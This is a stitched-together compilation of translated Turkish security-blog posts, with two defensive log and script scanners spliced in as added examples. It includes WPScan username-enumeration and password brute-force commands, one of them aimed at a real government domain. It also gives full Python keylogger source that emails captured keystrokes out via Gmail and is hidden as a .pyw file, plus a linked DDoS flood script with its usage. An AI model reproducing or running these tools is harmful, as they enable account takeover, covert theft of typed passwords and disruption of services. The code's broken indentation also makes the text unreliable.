Brute Force WordPress Sites


What is Brute Force:

Brute Force Attack: in its simplest terms, it is the attempt of every password in a list against the target system. Password lists consisting of millions of passwords can be prepared for this; these prepared lists are called “word lists”. They can also be produced specifically for a person or a system. In our previous articles, we showed how to create a “word list” specific to a person or a system. These “word lists” can be tried one after another to log in to systems. The simplest protection against a brute force attack is to create passwords that are hard to guess and to avoid common sequences (for example: 123456) in passwords.


Now let’s come to our main topic, Brute Force WordPress Sites:

The tool we need is “WPScan”. It comes pre-installed on Kali Linux, the operating system created for hackers and cybersecurity professionals, where you can easily perform penetration tests.

WPScan is a penetration testing program created specifically for WordPress sites. Of course, we show how to use it for educational purposes only; as www.siberguvenlikblogu.com, we are not responsible for its use for malicious purposes.

One of the things we need is Admin’s username, usually “admin”, but it won’t be the same for every WordPress site.

You can find the usernames on the target WordPress system with this command:

wpscan –url https://ihra2021.mfa.gr disable-tls-check –enumerate u

Now the code required to Brute Force Attack the found user:

wpscan –url target_url disable-tls-check –usernames target_user –passwords /usr/share/wordlists/rockyou.txt -t 3 –password-attack wp-login

To explain the parameters;

disable-tls-check: Required to bypass tls certificate check

–usernames: Username to Brute Force

–passwords: Word list location

-t: threads 3 is our recommendation (you can make changes from site to site)

–password-attack: Parameter to Brute Force

wp-login: Admin Panel (this may not be the same on every site, but it’s like that for most WordPress sites)

It will automatically report the password when a login to the target system succeeds. You can then log in to the system with that username and password.

Finally, it should be noted that the WPScan tool has a very complex structure and many parameters. There will be more detailed articles about WPScan in the future.
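
From the defender's side, this kind of attempt shows up in the web server's access log as repeated POST requests to wp-login.php from one client. The following is an added example, not part of the original article: it assumes Combined Log Format and default WordPress behaviour (HTTP 200 for a failed login, 302 for a successful one), and the sample log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Combined Log Format: ip - user [time] "METHOD path PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def detect_wp_login_bruteforce(lines, max_failures=5, window=timedelta(minutes=5)):
    """Return {ip: {"failures": n, "success_after_failures": bool}}.

    Assumption: a failed POST to /wp-login.php answers 200 (form shown
    again) and a successful one answers 302 (redirect to the dashboard).
    A sliding window catches slow, low-thread attempts that a simple
    per-second rate limit would miss.
    """
    recent = defaultdict(deque)  # ip -> timestamps of failures inside the window
    findings = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != "/wp-login.php":
            continue
        ts = datetime.strptime(m["ts"], TS_FORMAT)
        ip, status = m["ip"], m["status"]
        q = recent[ip]
        while q and ts - q[0] > window:
            q.popleft()  # drop failures that fell out of the window
        if status == "200":
            q.append(ts)
            if len(q) >= max_failures:
                f = findings.setdefault(
                    ip, {"failures": 0, "success_after_failures": False})
                f["failures"] = max(f["failures"], len(q))
        elif status == "302" and ip in findings and q:
            # A login that succeeds right after a burst of failures is the
            # case to escalate: the password was probably guessed.
            findings[ip]["success_after_failures"] = True
    return findings


def build_sample_log():
    """Constructed sample lines using documentation IP ranges."""
    base = datetime(2024, 3, 10, 10, 0, 0, tzinfo=timezone.utc)

    def row(ip, offset, request, status):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FORMAT)
        return f'{ip} - - [{ts}] "{request} HTTP/1.1" {status} 4521 "-" "-"'

    # One client failing every 20 seconds, then getting in.
    lines = [row("203.0.113.7", 20 * i, "POST /wp-login.php", 200) for i in range(8)]
    lines.append(row("203.0.113.7", 170, "POST /wp-login.php", 302))
    # A normal user: loads the form, mistypes once, then logs in.
    lines.append(row("198.51.100.20", 30, "GET /wp-login.php", 200))
    lines.append(row("198.51.100.20", 40, "POST /wp-login.php", 200))
    lines.append(row("198.51.100.20", 55, "POST /wp-login.php", 302))
    return lines


if __name__ == "__main__":
    for ip, info in detect_wp_login_bruteforce(build_sample_log()).items():
        print(ip, info)
```

A flagged address with success_after_failures set means the affected account's password should be reset and its sessions reviewed, not only the address blocked.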

Activating Kali Linux Root User


What is Root Setting:

Root is the most privileged user in Linux-based operating systems such as Kali Linux. Being root means having unlimited access to everything in the system.

As of Kali Linux 2020.1, the root user is no longer set up automatically during installation. This means we need the “sudo” command to run even simple commands such as “ifconfig”, and then have to enter the user password we set. This gets annoying after a while. After running the command below once, you will be able to activate the root account alongside your own user account and log in as root.

sudo passwd root

With this command, we set the password of the root account, which is not removed in Kali Linux but has no password created during installation. Because you are using sudo, it will first ask for your user password. After entering it correctly, you will set the root account password. The passwords will not appear as you type; this is a security measure, and passwords are not shown in the terminal.

Then switch user or restart the system and log in as root. You will no longer need the “sudo” command and password to run any command. You will have full authority on your system.

What’s Happening in Turkish Virtual?


Welcome to “What’s Happening in the Turkish Virtual Realm”, our news piece in which we will objectively describe the events, wars and all kinds of situations that have occurred in the Turkish Virtual Realm in recent months, and more. Cyber Security Blog presents it to you, our valued followers. Enjoy reading our article, in which we will touch on every subject without exception.

  • About Hacking of Turkish Sites that have increased in recent months:

Previously, we observed hacks of Turkish companies’ websites, Turkish blog sites and Turkish forum sites. However, they were not as frequent as they have been recently. According to the research we did before preparing this article, most Turkish sites are hacked by Turkish hackers or by some hackers from Azerbaijan. It’s a deplorable situation. These attacks are due to very weak site security.

These attacks are not in the form of leaking data, but in the form of indexing the home page or a different part of the site. This shows us that some attacks such as “NoRedirect, Subdomain Takeover, Brute Force and Admin Panel login” have been carried out. Especially recently, most sites are hacked with the NoRedirect vulnerability in the Admin panel. This vulnerability is very easy to exploit and in our opinion, it’s not even a real hack. It saddens us that there are still such vulnerabilities on so many websites today.

So What Do Those Who Hack Turkish Sites Earn:

They do not earn anything financially. In some cases, the admins of the sites may pay a certain amount of money for the vulnerabilities to be reported and closed. But this happens very rarely. Generally, lawsuits are filed and the attackers are punished. They are sure to be caught for at least one attack, if not all of them, and sooner or later justice will be served to those who do these things.

When we look at the indexes posted on Turkish sites, we see an internal competition and messages given to other hackers. In other words, we can observe that hackers do it in an effort to rise above the internal hierarchical order of the virtual world and to satisfy their egos. As it is easy to exploit the vulnerabilities, many Turkish websites fall victim to internal conflicts.

Big Turkish Sites Hacked? (edu.tr / gov.tr / bel.tr)

As with other sites, no monetary gain is made. We do not disclose vulnerabilities on these sites, as they will adversely affect our government. However, they can also be hacked with easily exploitable vulnerabilities. Unlike other sites, the penalties for attacks on these sites are heavier. Since hackers think that they will go further in the hierarchical order we mentioned by attacking these sites, they also attack these sites.

  • About DDOS Attacks


Although groups such as Anonymous generally take responsibility for DDOS attacks in our country, it is not known who carried out most of the attacks. However, there are many people dealing with DDOS in the virtual world. For a short time, they can close large sites. Botnet networks are often used in large attacks.

  • Fights and Wars

At the moment, as always, there are defenders and hackers who are enemies of each other. These individuals attempt to social-engineer each other to reveal their information, or humiliate their opponents by criticizing what they are doing. This is how fights usually go. It goes so far as to share each other’s identity and family information.

As a result of the fights, the number of Turkish websites hacked like a competition is increasing. Hackers brag about the sites they hacked, as if they were showing off.

  • We interviewed for you a follower who did not want to be named. Formerly involved in these activities, he is currently continuing his career as a White Hat Hacker.

What do you think about the increasing number of hacking Turkish websites in recent months?

“Young people, who spend a lot of time at home and on the computer due to the pandemic process, started to learn these jobs. Turkish hackers started to increase. They started by learning to hack Turkish sites because it is easy to hack most Turkish sites”

What do you think about people spreading each other’s private information as a result of online fights?

“Virtual exposures and fights are all show and show. They don’t know the responsibility for what they do and it’s a huge crime.”

Making Keyloggers with Python


What is Keylogger:

A keylogger, used as spyware and monitoring software, is a kind of malware that records every keystroke you make on the keyboard and transmits it to another system. Because of a keylogger, your game accounts, social media accounts, messages, credit cards, bank accounts and more can be sent to others and compromised.

This type of software is based on secretly monitoring the keys on your keyboard. The malware records every keystroke you make and sends it to the person or people behind it, so that they can see what you are typing.

In this article, we will make an effective keylogger using the Python software language. We create for educational purposes. As www.siberguvenlikblogu.com, we do not take any responsibility for its use for different purposes. At the same time, unlike our articles in our other Python series, instead of giving direct source codes; Firstly, we will explain the code fragments for your better understanding. Afterwards, we will provide all the source codes so that it is easy for you to use.

Let’s Get Built

First of all, we start by importing the libraries we need, “pynput” and “smtplib”. We will record the keystrokes with the “pynput” library, and send the keystrokes recorded with the “smtplib” library to ourselves via mail.

import pynput
import smtplib

from pynput.keyboard import Key,Listener

With this function we will record every keystroke on the target system.


count = 0
keys = []

def on_press(key):
global count,keys
count += 1
print("{0} basıldı".format(key))
keys.append(key)

if count >= 10:
count = 0
write_file(keys)
keys = []

With this function, we will create a file named “log.txt” and print the recorded keystrokes to that file.

def write_file(keys):
with open("log.txt" , "a" , encoding="utf-8") as file:
for key in keys:

k = str(key).replace("'", "")
if k.find("space") > 0:
file.write("n")
elif k.find("Key") == -1:
file.write(k)

With our last function, we will ensure that the recorded keystrokes are sent by e-mail to the e-mail address we specified each time the target system presses the “esc” key. The e-mail address that will send us the log records must be “gmail”. Another thing to note is that:

You need to enable the “Less Secure Application Access” section, which is optionally offered by Gmail, which is disabled for accounts without two-step verification, from this link. If you skip this, it will not send an e-mail.

def on_release(key):
if key == Key.esc:
from email.mime.text import MIMEText
with open('log.txt') as fp:

msg = MIMEText(fp.read())

msg[

'Subject'] = 'Log Kayıtları -> {}'.format("log.txt")
msg[
'From'] = "gonderilecek_mail_adresi"
msg['To'] = "gonderilecek_mail_adresi"


s = smtplib.SMTP("smtp.gmail.com",587)
s.ehlo()
s.starttls()
s.login(
"gönderecek_mail_adresi(@işareti ve sonrası olmayacak)",mailin_şifresi)
s.send_message(msg)
s.quit()

Here is all the source code of our Keylogger, which we have explained piece by piece;

import pynput
import smtplib

from pynput.keyboard import Key,Listener

count = 0
keys = []

def on_press(key):
global count,keys
count += 1
print("{0} basıldı".format(key))
keys.append(key)

if count >= 10:
count = 0
write_file(keys)
keys = []

def write_file(keys):
with open("log.txt" , "a" , encoding="utf-8") as file:
for key in keys:

k = str(key).replace("'", "")
if k.find("space") > 0:
file.write("n")
elif k.find("Key") == -1:
file.write(k)

def on_release(key):
if key == Key.esc:
from email.mime.text import MIMEText
with open('log.txt') as fp:

msg = MIMEText(fp.read())

msg['Subject'] = 'Log Kayıtları -> {}'.format("log.txt")
msg['From'] = "gonderilecek_mail_adresi"
msg['To'] = "gonderilecek_mail_adresi"


s = smtplib.SMTP("smtp.gmail.com",587)
s.ehlo()
s.starttls()
s.login("gonderecek_mail_adresi(@isareti ve sonrası olmayacak)","mailin_sifresi")
s.send_message(msg)
s.quit()

with Listener(on_press = on_press, on_release = on_release) as listener:
listener.join()

You will save this as a .pyw file, that is, Python No Console, so that the console does not open while it is running. It will continue to run in the background until you turn off the computer or turn it off from the task manager. There are also ways to fix it to the beginning and not to close, but we do not share it because it will have very dangerous consequences.
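
From the defender's side, the script above has a recognisable shape: a keyboard-hook library (pynput) imported together with a module that can send data off the machine (smtplib). The following added example, which is not part of the original article, is a small static triage function for Python scripts found on a host; the module watch lists and the scoring are assumptions made for illustration, and the samples are constructed and inert.

```python
import ast
import re

# Assumed watch lists for this example; extend them for your environment.
HOOK_MODULES = {"pynput", "keyboard", "pyHook"}  # keyboard-hook libraries
SEND_MODULES = {"smtplib", "ftplib", "socket", "requests", "urllib", "http"}
IMPORT_RE = re.compile(r"^\s*(?:from|import)\s+([A-Za-z_]\w*)", re.MULTILINE)


def imported_roots(source):
    """Return (top-level imported package names, AST or None if unparsable)."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        # Scraped or hand-edited scripts often have broken indentation;
        # fall back to a line-based scan so they are not skipped.
        return set(IMPORT_RE.findall(source)), None
    roots = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            roots.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            roots.add(node.module.split(".")[0])
    return roots, tree


def listener_callbacks(tree):
    """Keyword names passed to any call named Listener(...), e.g. on_press."""
    found = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
            if name == "Listener":
                found.update(kw.arg for kw in node.keywords if kw.arg)
    return found


def triage(source):
    """Score one script: 0 = nothing of interest, 4 = hook + sender + key callback."""
    roots, tree = imported_roots(source)
    hooks = sorted(roots & HOOK_MODULES)
    senders = sorted(roots & SEND_MODULES)
    callbacks = sorted(listener_callbacks(tree)) if tree is not None else []
    score = (1 if hooks else 0) + (2 if hooks and senders else 0)
    score += 1 if "on_press" in callbacks else 0
    return {"hooks": hooks, "senders": senders, "callbacks": callbacks,
            "parsed": tree is not None, "score": score}


# Constructed, inert samples (stub bodies only) used to exercise the scanner.
SAMPLE_HOOK_AND_MAIL = """
import smtplib
from pynput.keyboard import Key, Listener

def on_press(key):
    pass

with Listener(on_press=on_press) as listener:
    listener.join()
"""
SAMPLE_HOTKEY_TOOL = """
from pynput import keyboard

def on_press(key):
    pass

keyboard.Listener(on_press=on_press).start()
"""
SAMPLE_BROKEN_INDENT = "import smtplib\nfrom pynput.keyboard import Listener\ndef f(key):\npass\n"
SAMPLE_MAILER = "import smtplib\n"

if __name__ == "__main__":
    for label, src in [("hook+mail", SAMPLE_HOOK_AND_MAIL), ("hotkey", SAMPLE_HOTKEY_TOOL),
                       ("broken", SAMPLE_BROKEN_INDENT), ("mailer", SAMPLE_MAILER)]:
        print(label, triage(src))
```

A keyboard hook on its own (score 2 at most) is common in hotkey and accessibility tools, so the score is a reason to read the file, not a verdict.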

Who is this Qualin?


Major Cyber Attacks from Hacker Codenamed Qualin:

Last week, many large Turkish websites were hacked by a hacker named Qualin, otherwise known as Qualwin. The hacked sites include many Turkish state sites, state universities, sites of the Ministry of National Education and municipal sites. Qualin, who had previously made a name for himself with attacks on municipal sites and large sites, did something that would make more noise this time. Although there has not been much press coverage and no official statements have been made yet, the hacked sites are very serious and important sites.

The sites hacked by Qualin in the same week are as follows;

  • Western Black Sea Development Agency
  • Many Sub-Domains of Kırıkkale University
  • Ministry of National Education .k12 Domain
  • Erzurum Askale Municipality
  • European University of Lefke

What Is The Purpose Of These Attacks?

As understood from the messages left by the hacker codenamed Qualin, also known as Qualwin, he hacks with the philosophy of “Unsecured Sites and Vulnerable Sites Are Doomed to Destruction”. This shows that for hackers like Qualin, the importance and size of the site mean nothing. Likewise, the messages left in the indexes of the sites indicate that he is against violence against women.

You can reach the records of the attacks made last week by Qualin here;

What is Ransomware?


What is Ransomware?

Ransomware: Ransomware is a type of malware that forces the victim to do what the attacker wants by threatening to access, publish, or delete sensitive personal data without permission.

Ransomware is malware that somehow blocks and restricts access to files on target systems. In order for us to regain access, we are usually asked to pay with cryptocurrencies such as Bitcoin.

This malware works on the principle of encrypting files and blocking access to files by changing the file extension in a special way. Passwords placed on files and changed extensions can be corrected and restored by the people who programmed the Ransomware software or by cyber security companies.

How Ransomwares Spread

In our country, it generally infects computers through e-mails containing fake e-invoices. Like a computer worm, it then infects other computers and systems in the network. The most common ransomware in our country is the software called CryptoLocker. So much so that the websites of official government offices share articles on ways to get rid of this ransom virus.

How to Recover Files Infected by Ransomware

It is possible to restore most files that have been encrypted and had their extension changed. For this, cybersecurity companies have software to recover your files without having to pay the hackers. There are many ransomware decryption tools, since a different method is needed for each extension and encryption method.

You can find Kaspersky’s free ransomware decryptors, the solution for most ransomware, at this link. When you enter the extension of the encrypted files in the search box that appears, you will see the tool created for that ransomware, which you can use for free.

Massive Ransomware Attacks Worldwide

Ransomware viruses such as WannaCry, which target Windows operating systems, caused a global crisis around the world. Big companies have lost billions of dollars because of these Ransom Viruses that have affected almost all countries. In our country, large companies have paid hackers huge sums of money for Ransom Viruses. Even the intelligence agencies of countries have stepped in for some Ransom Viruses.

How to Get Free VDS?


What is VDS? :

VDS, in short, are private non-shared servers. The word VDS consists of the initials of the words Virtual Dedicated Server. It means Private Virtual Server. These are systems that are usually rented or purchased at a paid price.

In this article, we will show you how to get VDS for free and unlimited. You can use Linux systems or Windows systems as the operating system in VDSs. An example of a Linux operating system is Centos. An example of a Windows operating system is Windows 10.

Internet speeds of VDSs are quite high. Since the internet is provided from the server, it is much higher than the internet speeds we use at home. Thanks to VDS, you will be able to perform your transactions not with your own network, but on a very fast network created specifically for you.

How to Get Free and Unlimited VDS Service? :

In this article, as Cyber Security Blog, we will show you how to get free and unlimited VDS service with operating systems such as Ubuntu-based, Debian-based and RPM-based distributions, Windows 10 and Parrot OS.

The system we will use is completely free and unlimited. However, when you stay AFK for a certain period of time (10 minutes), that is, if you do not perform any activity or you switch to another window, the system will turn itself off. In addition, the password of the created VDS, needed for commands such as “sudo”, is 123456.

Actions You Will Take:

First we go to https://www.onworks.net/os-distributions/ web – address. We choose the operating system we want without the need for any registration or membership creation. There are almost all operating systems that are widely used in the world. When we enter the interface of the operating system we have chosen, we press the Run Online button.

Note that tools that block trackers and ads, such as AdBlocker, must be turned off. While this system provides a free hosting and VDS service, it does not allow entry with AdBlocker, as it earns money only from advertising revenue. If you have an ad blocker, you can use the system for free and without limits after turning it off.

After pressing the “Start” button on the screen, it will prepare the VDS for you. After waiting for an average of 20 seconds, you can log in and use your free VDS unlimitedly. We have launched Parrot OS as an example, you can choose the operating system you want.

How to Uninstall Blogger Mobile Extension (?m=1)


What is Blogger Mobile Extension? :

When the sites with Blogger infrastructure are accessed via mobile devices, “?m=1” is added to the end of the URL. This is the Blogger Mobile Extension. When we searched, we could not find many Turkish resources about removing this extension. In some foreign sources, there is a solution for a certain fee. In most Blogger themes, Google only indexes desktop URL extensions, causing the Blogger mobile extension (?m=1) to appear on mobile devices.

As Cyber Security Blog, in this article, we will show you how to get rid of the Blogger mobile extension (?m=1) completely free of charge. The action we will take will never affect systems such as Google AdSense. It only allows you to remove the Blogger mobile extension (?m=1) at the end of the URL.

Actions You Should Do:

First of all, go to the edit page of your blog at https://www.blogger.com/. Enter the theme section.

On the screen that comes up, enter the HTML editing section from the menu next to the customize section.

On the code screen that appears, use the CTRL+F combination. Search for command and paste the code one line below.

<script>
//<![CDATA[
/*! Siber Güvenlik Blogu - www.siberguvenlikblogu.com */
// Cut the address at each marker and update the address bar without reloading.
var markers = ["%3D", "%3D%3D", "&m=1", "?m=1"];
for (var i = 0; i < markers.length; i++) {
  var uri = window.location.toString();
  if (uri.indexOf(markers[i]) > 0) {
    var clean_uri = uri.substring(0, uri.indexOf(markers[i]));
    window.history.replaceState({}, document.title, clean_uri);
  }
}
// Send plain HTTP visitors to the HTTPS version of the same page.
var protocol = window.location.protocol.replace(/:/g, '');
if (protocol == 'http') {
  var url = window.location.href.replace('http', 'https');
  window.location.replace(url);
}
/*]]>*/</script>

Then save your actions from the save button in the upper right.

The process is complete. You have easily got rid of the Blogger mobile extension (?m=1). You can check it from a mobile device. In case of any error, you can send us your problem in the comments section or via the e-mail address contact@siberguvenlikblogu.com.

What is DDoS? How to Do a DDoS Attack?


What is DDoS?:

DDoS is the abbreviation of Distributed Denial of Service. It is a type of cyber attack that aims to temporarily or indefinitely disrupt a host service or services connected to the Internet, so that the service cannot be reached by users.

DDoS Attacks are translated into Turkish as “Distributed Denial of Service”. These types of attacks take advantage of the capacity limit that applies to any network resource, such as the infrastructure that provides a company’s website. A DDoS attack aims to exceed the website’s capacity to handle large numbers of requests and prevent it from working properly by sending multiple requests and packets to the attacked web resource at the same time.

Many companies have suffered great losses in DDoS attacks so far. Countries like America have increased penalties to prevent DDoS attacks. However, since most of the DDoS attackers cannot be found, the attacks cannot be prevented to a large extent. There are still many DDoS attacks in the world. You can watch live cyber attacks such as DDoS on our website by clicking here.

Precautions That Can Be Taken Against DDoS Attack:

Some measures you can take against DDoS attacks will be very effective. They are not very effective against some botnet attacks, but the measures that work against basic DDoS attacks are:

  • Increase the maximum bandwidth your site can receive. Since the number of packets sent in DDoS attacks is very large, this will allow your site to resist DDoS attacks for longer. However, this alone will not be enough.
  • Integrate anti-DDoS software such as Cloudflare into your site. This type of software works by analyzing the traffic coming to your site and preventing suspicious traffic from reaching it. It is highly effective against DDoS attacks.
  • Configure your server to be secure against attacks. If you do not have the authorization to do this yourself, inform your hosting provider so that the necessary action is taken.

You can protect yourself from DDoS attacks by taking basic precautions like these. However, these measures will of course not protect you from all attacks. Today, even very large companies and sites can be exposed to DDoS attacks and their systems can crash.

Botnets:

Botnets attack using “zombie” computers that can be controlled remotely. Through malicious software downloaded to the computer, your network and system are used in a botnet DDoS attack without your knowledge. These attacks are very difficult for the anti-DDoS software on websites to prevent, and generally cannot be prevented, because the software perceives them as normal requests. Therefore, botnet attacks are quite dangerous.

How to Do a DDoS Attack? :

First of all, it is necessary to say that making a DDoS attack is not legal and that this is shared with you for educational purposes only. siberguvenlikblogu.com is not responsible for any attacks.

In order to throw DDoS, systems with VDS or internet speed above certain levels are needed. If you do this with the networks you use at home, your own internet will also be affected by this situation, and your internet will be adversely affected depending on the number of packets sent.

An open source, powerful DDoS script written by the Admins of siberguvenlikblogu.com in Python language named “ddossonn.py” that we shared on Github:

https://github.com/emyounoone/ddossonn

You can start using it after downloading it using this link.

Use:

python ddossonn.py hedef_site_url

With this command, you can run the tool and throw DDoS.

How to Resolve DNS_PROBE_FINISHED_NXDOMAIN Error?

DNS_PROBE_FINISHED_NXDOMAIN error, as the name suggests, is caused by DNS.

There can be many reasons for this error. In this article, as the Cyber Security Blog, we will show you the methods to solve the annoying DNS_PROBE_FINISHED_NXDOMAIN error that you encounter when you try to enter a site.

This error can have multiple causes. The main reasons that can cause DNS_PROBE_FINISHED_NXDOMAIN Error are:

  • Firewall and Antivirus Software
  • VPN
  • Browser Plugins
  • Malware
  • Problems from ISP (Internet Service Provider)

These reasons are the main factors that can cause your DNS settings to change, corrupt and give errors.

First of all, let’s briefly summarize the concept of DNS, namely Domain Name System, so that you can understand the reasons for this error:

DNS:

DNS stands for “Domain Name System”. It converts hostnames to IP addresses. For example, when you want to enter a website, you visit it by entering the domain name of that site, for example siberguvenlikblogu.com, but in the background DNS servers work with the IP address. In this way, instead of memorizing and manually entering the IP address of a website, you can visit it easily by using the domain name. DNS is actually a very important system for us.

To get rid of this error, you can first forget the network you are connected to from the WiFi tab and connect again. If this does not give a positive result, you can examine the other causes and solutions below.

Firewall and Antivirus Software Errors:

Firewall and Antivirus Programs inspect and filter Web-Sites before opening them to prevent harmful content. They can cause this error by blocking the DNS addresses they see as objectionable. You can avoid this error by reviewing the settings of your Firewall and Anti-Virus Software.

VPN Caused Errors:

VPN increases your privacy while surfing the internet. In this article, we have given detailed information about VPN. VPN networks change your DNS addresses. You may encounter DNS_PROBE_FINISHED_NXDOMAIN error while using VPN.

Browser Plugins Caused Errors:

Browser add-ons may not be as innocent as you think. Some browser plugins can also play with your DNS settings, causing DNS_PROBE_FINISHED_NXDOMAIN error. It is necessary to disable or directly remove suspicious plugins.

Errors Caused by Malware:

Any malware that has entered your computer can play with your DNS settings or even render it completely unusable. In order to solve the error caused by malicious software, you can scan your device with a solid Anti-Virus software and clean the viruses. At the same time, formatting is an easy but effective solution for viruses.

Issues from ISP (Internet Service Provider):

If you are sure that none of the solutions work and none of the causes apply, the error may come from your ISP. To resolve this, you can call your ISP and report the situation. If the problem is caused by the ISP, they will fix it.

Command to Reset (clear) your DNS Settings:

In the Windows command line, in order:

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

Typing these commands clears your DNS settings.
